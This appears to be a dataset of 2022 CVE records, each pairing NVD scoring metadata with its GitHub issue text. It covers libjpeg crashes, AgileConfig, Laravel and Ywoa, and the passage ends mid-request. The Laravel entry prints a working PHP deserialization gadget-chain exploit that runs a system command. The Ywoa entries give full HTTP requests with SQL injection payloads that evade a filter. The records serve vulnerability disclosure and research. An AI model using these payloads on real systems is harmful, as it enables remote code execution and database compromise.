Hi, there. There is a segmentation fault in the newest master branch. Here is the reproducing command: `jpeg poc /dev/null` ``` Program received signal SIGSEGV, Segmentation fault. HuffmanDecoder::Get (this=0x0, io=0x7933c8) at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112 warning: Source file is more recent than executable. (gdb) bt #0 HuffmanDecoder::Get (this=0x0, io=0x7933c8) at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112 #1 0x0000000000491388 in LosslessScan::ParseMCU (this=0x793250, prev=0x7fffffffda90, top=0x7fffffffda70) at losslessscan.cpp:374 #2 0x0000000000491b4a in LosslessScan::ParseMCU (this=0x793250) at losslessscan.cpp:440 #3 0x000000000043aca1 in JPEG::ReadInternal (this=0x7904c8, tags=0x7fffffffdd40) at jpeg.cpp:345 #4 0x000000000043988b in JPEG::Read (this=0x7904c8, tags=0x7fffffffdd40) at jpeg.cpp:210 #5 0x000000000041cabb in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe6fc "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #6 0x0000000000408b6a in main (argc=<optimized out>, argv=0x0) at main.cpp:747 ``` [poc.zip](https://github.com/thorfdbg/libjpeg/files/9194930/poc.zip)
Segmentation fault in HuffmanDecoder::Get
https://api.github.com/repos/thorfdbg/libjpeg/issues/78/comments
1
2022-07-27T04:04:02Z
2022-08-03T12:23:15Z
https://github.com/thorfdbg/libjpeg/issues/78
1,318,990,797
78
4,007
CVE-2022-37770
2022-08-18T20:15:12.060
libjpeg commit 281daa9 was discovered to contain a segmentation fault via LineMerger::GetNextLowpassLine at linemerger.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/79" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/79" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/thorfdbg/libjpeg/issues/79
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
Hi, there. There is a segmentation fault in the newest master branch. Here is the reproducing command: `jpeg poc /dev/null` ``` (gdb) bt #0 0x00007ffff7f31270 in ?? () from /lib/x86_64-linux-gnu/libc.so.6 #1 0x0000000000711b6f in LineMerger::GetNextLowpassLine (this=0x85ed20, comp=2 '\002') at linemerger.cpp:262 #2 0x00000000007127d2 in LineMerger::GetNextExpandedLowPassLine (this=0x85ed20, comp=<optimized out>) at linemerger.cpp:339 #3 0x0000000000713251 in LineMerger::GetNextLine (this=0x85ed20, comp=2 '\002') at linemerger.cpp:360 #4 0x000000000071c2dd in HierarchicalBitmapRequester::Pull8Lines (this=0x792720, c=<optimized out>) at hierarchicalbitmaprequester.cpp:447 #5 0x0000000000720156 in HierarchicalBitmapRequester::ReconstructRegion (this=0x792720, orgregion=..., rr=0x7fffffffdae8) at hierarchicalbitmaprequester.cpp:739 #6 0x000000000045c501 in Image::ReconstructRegion (this=0x7923b0, bmh=0x7fffffffd790, rr=0x7fffffffdae8) at image.cpp:1115 #7 0x000000000043e266 in JPEG::InternalDisplayRectangle (this=0x7904c8, tags=0x7fffffffde90) at jpeg.cpp:721 #8 0x000000000043e14b in JPEG::DisplayRectangle (this=0x7904c8, tags=0x7fffffffde90) at jpeg.cpp:699 #9 0x000000000041e336 in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe704 "/dev/null", colortrafo=1, alpha=0x790280 "\230$\255", <incomplete sequence \373>, upsample=true) at reconstruct.cpp:331 #10 0x0000000000408b6a in main (argc=<optimized out>, argv=0x87a720) at main.cpp:747 ``` [poc.zip](https://github.com/thorfdbg/libjpeg/files/9249613/poc.zip)
Segmentation fault in LineMerger::GetNextLowpassLine
https://api.github.com/repos/thorfdbg/libjpeg/issues/79/comments
3
2022-07-28T04:17:56Z
2022-08-03T12:22:57Z
https://github.com/thorfdbg/libjpeg/issues/79
1,320,369,822
79
4,008
CVE-2022-35540
2022-08-18T23:15:08.293
Hardcoded JWT Secret in AgileConfig <1.6.8 Server allows remote attackers to use the generated JWT token to gain administrator access.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotnetcore/AgileConfig/issues/91" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotnetcore/AgileConfig/issues/91" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotnetcore:agileconfig:*:*:*:*:*:*:*:*", "matchCriteriaId": "839201E6-FD66-4BD5-954D-0A92390A5B8C", "versionEndExcluding": "1.6.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/dotnetcore/AgileConfig/issues/91
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dotnetcore", "AgileConfig" ]
The hard-coded JWT Secret in the source code allows remote attackers to gain administrator access in AgileConfig Server. Details and POC have been emailed. 源代码中存在JWT key 硬编码,导致原有的登录限制可能被绕过,直接以管理员权限访问系统 详细信息和POC已发送至邮箱
security vulnerability (存在安全漏洞)
https://api.github.com/repos/dotnetcore/AgileConfig/issues/91/comments
4
2022-07-06T16:15:01Z
2022-09-01T05:41:10Z
https://github.com/dotnetcore/AgileConfig/issues/91
1,296,073,627
91
4,009
CVE-2022-2886
2022-08-19T12:15:08.140
A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206688" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206688" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*", "matchCriteriaId": "3794CF34-E1D7-4E1A-808E-D5AA4C2154E0", "versionEndExcluding": null, "versionEndIncluding": "5.1.46", "versionStartExcluding": null, "versionStartIncluding": "5.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/beicheng-maker/vulns/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "beicheng-maker", "vulns" ]
# Laravel5.1 POP4 RCE `composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"` `app/Http/Controllers/UsersController.php adding a controller UsersController` ```php <?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller { /** * 创建一个新用户。 * * @param Request $request * @return Response */ public function store(Request $request) { echo "Please post cmd to unserialize"; $payload=$request->input("cmd"); unserialize($payload); // } } ?> ``` routes/web.php `Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);` ```php <?php use Illuminate\Support\Facades\Route; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | contains the "web" middleware group. Now create something great! | */ Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']); ``` ## exp ```php <?php namespace Faker; class DefaultGenerator{ public $default; } namespace Carbon; class Carbon{} namespace Faker; class Generator{ protected $formatters = []; public function __construct(){ $this->formatters['huahua']='system'; } } namespace Carbon; use Carbon\Carbon; use Faker\DefaultGenerator; use Faker\Generator; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default='huahua'; $this->current=new Carbon; $this->filters[][]=[new Generator,'format']; $this->key=array("calc.exe"); } } namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,'valid']; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?> ``` ![image](https://user-images.githubusercontent.com/63102521/185039456-b75f17ff-fa4c-427e-afb8-cb149a473b42.png)
Laravel5.1 POP4 RCE
https://api.github.com/repos/beicheng-maker/vulns/issues/3/comments
0
2022-08-17T05:08:35Z
2022-08-17T05:08:35Z
https://github.com/beicheng-maker/vulns/issues/3
1,341,174,463
3
4,010
CVE-2022-36605
2022-08-19T15:15:08.507
Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cloudwebsoft/ywoa/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cloudwebsoft/ywoa/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yimihome:ywoa:6.1:*:*:*:*:*:*:*", "matchCriteriaId": "EB7ABBCC-CAE9-442D-8084-176F08DBBAC0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cloudwebsoft/ywoa/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cloudwebsoft", "ywoa" ]
# ywoaSQL-Inject-Bypass # Environment build ## Windows build Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment http://partner.yimihome.com/static/index.html#/index/sys_env ## 1, personnel - personnel information - orderbyGET parameter SQL injection ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104752.png) ```http POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1 Host: 172.16.140.176:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl Content-Length: 15 page=2&limit=20 ``` Bypass Payload ```sql id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a) ``` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104756.png) # Environment build ## Windows build Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104815.png) One-click installation, after the installation will prompt the system has expired, go to setup and take a look ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104820.png) Until June 1, but it's okay, here to change the system time can be ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104825.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104832.png) Login successfully # Code audit ## 1. Personnel - personnel information - orderbyGET parameter SQL injection ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104838.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104843.png) ```http POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1 Host: 192.168.0.35:9888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.0.35:9888/oa/swagger-ui.html Origin: http://192.168.0.35:9888 Connection: close Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl Content-Length: 137 page=1&limit=20&realname_cond=0&realname=test18&sex=&sex_cond=1&dept=&dept_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode= ``` ### SQL injection Bypass The above injection payload is as follows ```sql id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) ``` The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104852.png) After building it, debug it remotely with idea ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104859.png) When you try to reproduce this vulnerability again, you will be prompted with an XSS interception ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104905.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104911.png) It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104917.png) The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104928.png) Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104935.png) Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic Next you will come to Antixss.Java ``` src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java ``` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104942.png) The antiXSS method is called by passing in the html to be detected and a true ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104949.png) Follow directly in to see ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721104957.png) Check the _antiXSS method, where the content is passed in is the content to be detected ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105004.png) Here is the specific detection logic, but I'm only looking at the `stripScriptTag` method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105009.png) Mainly by means of regularity and case-insensitive because of `CASE_INSENSITIVE` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105017.png) Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105025.png) Remove AND ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105033.png) The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105040.png) statement returns normally, then after returning here ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105046.png) Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the `isValidSqlParam` method ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105051.png) Follow the `sql_inj` method ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105057.png) We have already bypassed the detection of and and need to bypass the code logic in the second box ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105106.png) The main logic here is to separate inj_str using `|`, which will generate a list to inj_stra[], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj_stra[i] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105118.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105125.png) In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select Here I was going to try to use ```sql && extractvalue(1,concat('~',database())) ``` Unfortunately, `'~'` will be detected as XSS, so this method does not work ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105133.png) The && here needs to be converted to url encoding, otherwise this request will report 400 ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105139.png) So we can only think of ways to select this keyword, here is a bypass of the payload ```sql id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a) ``` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105144.png) Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the `sql_inj` method ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105149.png) So there is no way to capitalize to bypass ```http POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1 Host: 172.16.140.176:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl Content-Length: 15 page=2&limit=20 ``` ### Function implementation entrance ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105156.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105210.png) First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105218.png) Continue to the next page ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105225.png) Here is the OA developer's own implementation of the SQLBuilder class ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105233.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105239.png) Follow this method ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105246.png) Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105252.png) Follow up this listResult method ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105300.png) The statements will then be spelled out in the middle ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105311.png) The executeQuery statement is then executed ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105318.png) The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220721105323.png) This is followed by a return, which is executed here with a 5-second wait, so it causes an injection
ywoa SQL inject Bypass and Analysis of the article
https://api.github.com/repos/cloudwebsoft/ywoa/issues/24/comments
0
2022-07-21T02:54:36Z
2023-09-07T13:28:46Z
https://github.com/cloudwebsoft/ywoa/issues/24
1,312,410,083
24
4,011
CVE-2022-36606
2022-08-19T15:15:08.550
Ywoa before v6.1 was discovered to contain a SQL injection vulnerability via /oa/setup/checkPool?database.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cloudwebsoft/ywoa/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cloudwebsoft/ywoa/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yimihome:ywoa:*:*:*:*:*:*:*:*", "matchCriteriaId": "70ADA123-C9C3-426E-A8EA-94CD3E377B74", "versionEndExcluding": "6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cloudwebsoft/ywoa/issues/25
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cloudwebsoft", "ywoa" ]
# Environment construction http://partner.yimihome.com/static/index.html#/index/sys_env ![image-20220722103741100](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103741.png) Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can http://172.16.140.189:8088/oa/setup/license.jsp Once installed here, the source code is available for download at gitee https://gitee.com/bestfeng/yimioa Download a good local idea to open a static look at the code on ![image-20220722103950332](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103950.png) # [Frontend] <6.1 Version Unauthorized SQL Injection ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103602.png) Through the `apikit` interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code `src/main/java/com/cloudweb/oa/controller/ApplicationController.java` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103606.png) The above does not need to care, specifically note the following if(isValid) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103611.png) First get the version from the configuration ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103614.png) Get to version 6.1, then start the version determination ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103618.png) Determine if it is less than 3 ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103623.png) Determine if it is less than 4 ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103626.png) Determine if it is less than 5 ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103630.png) Determine if it is equal to 6 ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103633.png) The condition to be used here is that the version needs to be <= 6 in order to be successful So change the version ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103637.png) You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in `src/main/java/com/cloudweb/oa/service/LoginService.java` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103641.png) ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103645.png) Just change the value of the version field in the oa_sys_ver table in the database ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103649.png) Restart tomcat after the change, and then request the specified interface without logging in ```http POST /oa/setup/checkPool?database=test' HTTP/1.1 Host: 172.16.140.186:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: 